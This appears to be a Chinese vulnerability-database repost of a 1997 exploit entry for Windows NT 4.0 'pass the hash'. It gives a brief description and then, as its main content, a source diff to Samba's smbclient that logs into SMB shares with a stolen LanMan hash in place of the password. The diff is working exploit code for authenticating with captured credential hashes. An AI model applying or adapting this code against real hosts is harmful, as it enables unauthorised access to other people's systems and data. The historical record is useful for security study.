2021年4月8日18:01:53Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client已关闭评论61 views字数 2320阅读7分44秒阅读模式
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client
| 漏洞ID | 1053345 | 漏洞类型 | |
| 发布时间 | 1997-04-08 | 更新时间 | 1997-04-08 |
CVE编号
|
N/A |
CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/233/info
A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.
Paul Ashton <[email protected]> posted the theory and corresponding exploit code to NTBugtraq. In order for his code to work, you must "exist both in /etc/passwd and /usr/local/samba/private/smbpasswd as the same username and same uid as your rid in NT, and smbclient can read it".
In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host.
*** orig_client.c Tue Apr 8 17:27:29 1997
--- client.c Tue Apr 8 20:57:43 1997
***************
*** 3020,3026 ****
{-1,NULL}
};
-
/****************************************************************************
send a login command
****************************************************************************/
--- 3020,3025 ----
***************
*** 3039,3044 ****
--- 3038,3061 ----
int numprots;
int tries=0;
+ #ifdef USESMBPASSWDFILE
+ /*TODO check for valid password and uid = getuid */
+ BOOL got_encpass;
+ struct passwd *pwd;
+ struct smb_passwd *smb_pass;
+ unsigned char p21[21];
+
+ memset(p21, 0, sizeof p21);
+ pwd = getpwuid(getuid());
+ if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name)))
+ {
+ strcpy(password, "not empty");
+ got_pass = got_encpass = True;
+ memcpy(p21, smb_pass->smb_passwd, 16);
+ }
+ setuid(getuid());
+ #endif
+
if (was_null)
{
inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN);
***************
*** 3189,3194 ****
--- 3205,3215 ----
if (doencrypt && *pass) {
DEBUG(3,("Using encrypted passwordsn"));
passlen = 24;
+
+ #ifdef USESMBPASSWDFILE
+ if (got_encpass) E_P24(p21,cryptkey,pword);
+ else
+ #endif
SMBencrypt(pass,cryptkey,pword);
}
#else
***************
*** 3252,3257 ****
--- 3273,3281 ----
(CVAL(inbuf,smb_rcls) == ERRSRV &&
SVAL(inbuf,smb_err) == ERRbadpw)))
{
+ #ifdef USESMBPASSWDFILE
+ got_encpass =
+ #endif
got_pass = False;
DEBUG(3,("resending loginn"));
goto get_pass;相关推荐: NT "Pass the Hash" with Modified SMB Client Vulnerability
NT "Pass the Hash" with Modified SMB Client Vulnerability 漏洞ID 1105081 漏洞类型 Access Validation Error 发布时间 1997-04-08 更新时间 1997-04-0…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论